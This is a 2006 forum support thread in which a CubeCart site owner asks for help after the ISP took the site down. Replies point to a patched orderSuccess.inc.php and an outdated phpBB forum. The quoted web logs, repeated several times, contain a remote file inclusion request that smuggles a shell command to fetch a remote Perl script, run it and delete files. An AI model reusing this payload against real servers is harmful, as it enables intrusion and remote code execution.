Guest johnkolk Posted July 13, 2006 Share Posted July 13, 2006 Our isp has taken our site offline because of a security problem so can someone please help? See below fro the message from the isp. (i hope this is the correct place to post this as I'm not here often) Cheers John Our web logs are full of entries like the following: www.secretdesire.co.nz 62.94.211.42 - - [12/Jul/2006:08:30:22 +1200] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]= http://www.bkjassn.com/forum/cache/cmd.txt...%20/tmp/;GET%20 http://www.bkjassn.com/forum/cache/mambotz.txt%20> %20mambotz.txt;perl%20mambotz.txt;rm%20*? HTTP/1.0" 200 148 "-" "Mozilla/5.0" If you are running the latest version of the cart software then you should raise this issue with the developers. We can not allow this software to run in its present form, as it presents a serious security risk to the entire server. Quote Link to comment Share on other sites More sharing options...
Guest vrakas Posted July 13, 2006 Share Posted July 13, 2006 www.secretdesire.co.nz 62.94.211.42 - - [12/Jul/2006:08:30:22 +1200] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir] =http://www.bkjassn.com/forum/cache/cmd.txt?&cmd=cd%20/tmp/;GET http://www.bkjassn.com/forum/ cache/mambotz.txt%20>%20mambotz.txt;perl%20mambotz.txt;rm%20*? HTTP/1.0" 200 148 "-" "Mozilla/5.0" From what i read here it seems that its the FORUM you have installed and NOT CubeCart :rolly: Quote Link to comment Share on other sites More sharing options...
Guest EverythingWeb Posted July 13, 2006 Share Posted July 13, 2006 The orderSuccess issue was resolved in 3.0.10. UPLOAD A NEW COPY OF orderSuccess.inc.php From the 3.0.10 Archive downloadable from this site. Keeping upto date with software upgrades would not present this problem. Quote Link to comment Share on other sites More sharing options...
Guest johnkolk Posted July 13, 2006 Share Posted July 13, 2006 hi thanks for your help but i don't understand, The site has been running without fault for a few months now? I understand the owners has registered it as well www.secretdesire.co.nz 62.94.211.42 - - [12/Jul/2006:08:30:22 +1200] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir] =http://www.bkjassn.com/forum/cache/cmd.txt?&cmd=cd%20 /tmp/;GET http://www. bkjassn.com/forum/cache/mambotz.txt%20>%20mambotz.txt;perl%20mambotz.txt;rm%20*? HTTP/1.0" 200 148 "-" "Mozilla/5.0" From what i read here it seems that its the FORUM you have installed and NOT CubeCart Thanks for looking at this We made this site on 3.0.10 but it was when it was first released so I guess what you are saying is that something may have changed? (sorry but I'm not up with all the terms and lingo) thanks John The orderSuccess issue was resolved in 3.0.10. UPLOAD A NEW COPY OF orderSuccess.inc.php From the 3.0.10 Archive downloadable from this site. Keeping upto date with software upgrades would not present this problem. Quote Link to comment Share on other sites More sharing options...
Guest Coder68 Posted July 13, 2006 Share Posted July 13, 2006 I went to your website and more to the point your forum. Your forum is way out of date. You are running version 2.0.6 "Powered by phpBB 2.0.6 © 2001, 2002 phpBB Group" I am the administrator of a forum running phpBB software and it is up to version 2.0.21 The security flaw that vrakas said is affecting your site relates to the outdated software for your forum. Please go to http://www.phpbb.com/downloads.php and download the update and install it. Good luck, Coder68 Quote Link to comment Share on other sites More sharing options...
Guest johnkolk Posted July 13, 2006 Share Posted July 13, 2006 Thanks Coder68. I will do so now I went to your website and more to the point your forum. Your forum is way out of date. You are running version 2.0.6 "Powered by phpBB 2.0.6 © 2001, 2002 phpBB Group" I am the administrator of a forum running phpBB software and it is up to version 2.0.21 The security flaw that vrakas said is affecting your site relates to the outdated software for your forum. Please go to http://www.phpbb.com/downloads.php and download the update and install it. Good luck, Coder68 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.